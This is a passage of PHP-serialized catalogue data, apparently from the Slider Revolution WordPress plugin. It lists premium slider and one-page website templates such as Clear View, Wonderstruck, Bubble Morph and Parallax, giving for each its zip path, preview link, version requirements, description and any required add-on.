href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:221;a:25:{s:2:\"id\";s:3:\"230\";s:5:\"title\";s:23:\"Clear View Single Media\";s:5:\"alias\";s:23:\"clear-view-single-media\";s:3:\"zip\";s:33:\"packs/clear-view-single-media.zip\";s:3:\"uid\";s:32:\"c480368ded2a64f0cdd44f1674213814\";s:3:\"img\";s:34:\"clear-view-single-media/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:222;a:25:{s:2:\"id\";s:3:\"231\";s:5:\"title\";s:22:\"Clear View Single More\";s:5:\"alias\";s:22:\"clear-view-single-more\";s:3:\"zip\";s:32:\"packs/clear-view-single-more.zip\";s:3:\"uid\";s:32:\"9c693190df26218366d1f77e10cf550a\";s:3:\"img\";s:33:\"clear-view-single-more/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:223;a:25:{s:2:\"id\";s:3:\"232\";s:5:\"title\";s:25:\"Clear View Single Contact\";s:5:\"alias\";s:25:\"clear-view-single-contact\";s:3:\"zip\";s:35:\"packs/clear-view-single-contact.zip\";s:3:\"uid\";s:32:\"73c0a889f2b654a87b5aba1ff76fbc5c\";s:3:\"img\";s:36:\"clear-view-single-contact/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:224;a:22:{s:2:\"id\";s:3:\"233\";s:5:\"title\";s:18:\"Clean Landing Page\";s:5:\"alias\";s:16:\"cleanlandingpage\";s:3:\"zip\";s:20:\"cleanlandingpage.zip\";s:3:\"uid\";s:32:\"727a3680d312f22c6a5998ebdb9afe52\";s:3:\"img\";s:27:\"cleanlandingpage/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/clean-landing-page-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:203:\"<span class=\"ttm_content\">The Clean Landing Page is a fullscreen Intro Module that is a striking introduction to any minimal website, with no unnecessary elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:225;a:22:{s:2:\"id\";s:3:\"234\";s:5:\"title\";s:9:\"Clear Cut\";s:5:\"alias\";s:8:\"clearcut\";s:3:\"zip\";s:12:\"clearcut.zip\";s:3:\"uid\";s:32:\"07f43c00e9b4d3057a03cdb3385ad2b7\";s:3:\"img\";s:19:\"clearcut/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/clear-cut-portfolio-website-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:240:\"<span class=\"ttm_content\">The Clear Cut Template is an All-In-One Portfolio Website solution that works best for smaller portfolios. Highlight your best work in a striking and mobile friendly fashion!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:226;a:25:{s:2:\"id\";s:3:\"235\";s:5:\"title\";s:22:\"Wonderstruck One-Pager\";s:5:\"alias\";s:30:\"wonderstruck-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:30:\"wonderstruck-one-pager-package\";s:3:\"img\";s:44:\"packages/wonderstruck-one-pager-overview.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:227;a:25:{s:2:\"id\";s:3:\"236\";s:5:\"title\";s:17:\"Wonderstruck Menu\";s:5:\"alias\";s:17:\"wonderstruck_menu\";s:3:\"zip\";s:27:\"packs/wonderstruck_menu.zip\";s:3:\"uid\";s:32:\"0a976e9aaae59c4f795b38f59f5a08d8\";s:3:\"img\";s:28:\"wonderstruck_menu/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:228;a:25:{s:2:\"id\";s:3:\"237\";s:5:\"title\";s:19:\"Wonderstruck Header\";s:5:\"alias\";s:19:\"wonderstruck_header\";s:3:\"zip\";s:29:\"packs/wonderstruck_header.zip\";s:3:\"uid\";s:32:\"e1379f77a902960a0ce12d44d85a9e0a\";s:3:\"img\";s:30:\"wonderstruck_header/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:229;a:25:{s:2:\"id\";s:3:\"238\";s:5:\"title\";s:18:\"Wonderstruck About\";s:5:\"alias\";s:18:\"wonderstruck_about\";s:3:\"zip\";s:28:\"packs/wonderstruck_about.zip\";s:3:\"uid\";s:32:\"d207fb140fd328acc3038300ea52082a\";s:3:\"img\";s:29:\"wonderstruck_about/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:230;a:25:{s:2:\"id\";s:3:\"239\";s:5:\"title\";s:18:\"Wonderstruck Works\";s:5:\"alias\";s:18:\"wonderstruck-works\";s:3:\"zip\";s:28:\"packs/wonderstruck-works.zip\";s:3:\"uid\";s:32:\"4476935097e27d92454b0011b7700c1d\";s:3:\"img\";s:29:\"wonderstruck-works/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:231;a:25:{s:2:\"id\";s:3:\"240\";s:5:\"title\";s:20:\"Wonderstruck Contact\";s:5:\"alias\";s:20:\"wonderstruck-contact\";s:3:\"zip\";s:30:\"packs/wonderstruck-contact.zip\";s:3:\"uid\";s:32:\"9e4911521f77bce2b8efa40f4c2adc22\";s:3:\"img\";s:31:\"wonderstruck-contact/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:232;a:22:{s:2:\"id\";s:3:\"241\";s:5:\"title\";s:12:\"Bubble Morph\";s:5:\"alias\";s:11:\"bubblemorph\";s:3:\"zip\";s:15:\"bubblemorph.zip\";s:3:\"uid\";s:32:\"1102d6f5460ab82cb612cbe9f1d9514b\";s:3:\"img\";s:22:\"bubblemorph/slide1.jpg\";s:7:\"preview\";s:75:\"https://revolution.themepunch.com/bubble-morph-effect-add-on-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:188:\"<span class=\"ttm_content\">The Bubble Morph Add-On allows you to create interesting Lava-Lamp style effects on any of your Slider Revolution content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:233;a:22:{s:2:\"id\";s:3:\"242\";s:5:\"title\";s:16:\"Distortion AddOn\";s:5:\"alias\";s:15:\"distortionaddon\";s:3:\"zip\";s:19:\"distortionaddon.zip\";s:3:\"uid\";s:32:\"0ad46c9929bb2fa6316f1e6ced301aaf\";s:3:\"img\";s:26:\"distortionaddon/slide1.jpg\";s:7:\"preview\";s:73:\"https://revolution.themepunch.com/distortion-effect-add-on-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Distortion Add-On allows you to create interesting Distortion style effects on any of your Slider Revolution content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:182:\"[{\"path\":\"revslider-liquideffect-addon\\/revslider-liquideffect-addon.php\",\"name\":\"Distortion Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:234;a:22:{s:2:\"id\";s:3:\"243\";s:5:\"title\";s:10:\"Club Flyer\";s:5:\"alias\";s:9:\"clubflyer\";s:3:\"zip\";s:13:\"clubflyer.zip\";s:3:\"uid\";s:32:\"dab73b9904d0e643a35b0475980998bd\";s:3:\"img\";s:20:\"clubflyer/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/club-flyer-landing-page-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:227:\"<span class=\"ttm_content\">This Club Fyler Template for Slider Revolution uses the brand new Exploding Layers Add-On to create a captivating effect. Tap into unlimited creative potential. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:187:\"[{\"path\":\"revslider-explodinglayers-addon\\/revslider-explodinglayers-addon.php\",\"name\":\"Exploding Layers AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:235;a:22:{s:2:\"id\";s:3:\"244\";s:5:\"title\";s:16:\"Paintbrush AddOn\";s:5:\"alias\";s:15:\"paintbrushaddon\";s:3:\"zip\";s:19:\"paintbrushaddon.zip\";s:3:\"uid\";s:32:\"c85c48a6742b4bf72a2590cc1b50f6a0\";s:3:\"img\";s:26:\"paintbrushaddon/slide1.jpg\";s:7:\"preview\";s:73:\"https://revolution.themepunch.com/paintbrush-effect-add-on-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:239:\"<span class=\"ttm_content\">The Paintbrush Add-On for WordPress allows you to add cool mouse interaction effects to your Slider Revolution content. Examples: Blur Reveal, Color Reveal, Scratch Me Free.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-paintbrush-addon\\/revslider-paintbrush-addon.php\",\"name\":\"Paintbrush AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:236;a:25:{s:2:\"id\";s:3:\"245\";s:5:\"title\";s:18:\"Parallax One-Pager\";s:5:\"alias\";s:26:\"parallax-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"parallax-one-pager-package\";s:3:\"img\";s:39:\"packages/parallax-one-pager-package.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:237;a:25:{s:2:\"id\";s:3:\"246\";s:5:\"title\";s:15:\"Parallax Header\";s:5:\"alias\";s:15:\"parallax_header\";s:3:\"zip\";s:25:\"packs/parallax_header.zip\";s:3:\"uid\";s:32:\"32bf4a0f5136853bd6bd366275a7a60b\";s:3:\"img\";s:26:\"parallax_header/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:238;a:25:{s:2:\"id\";s:3:\"247\";s:5:\"title\";s:16:\"Parallax 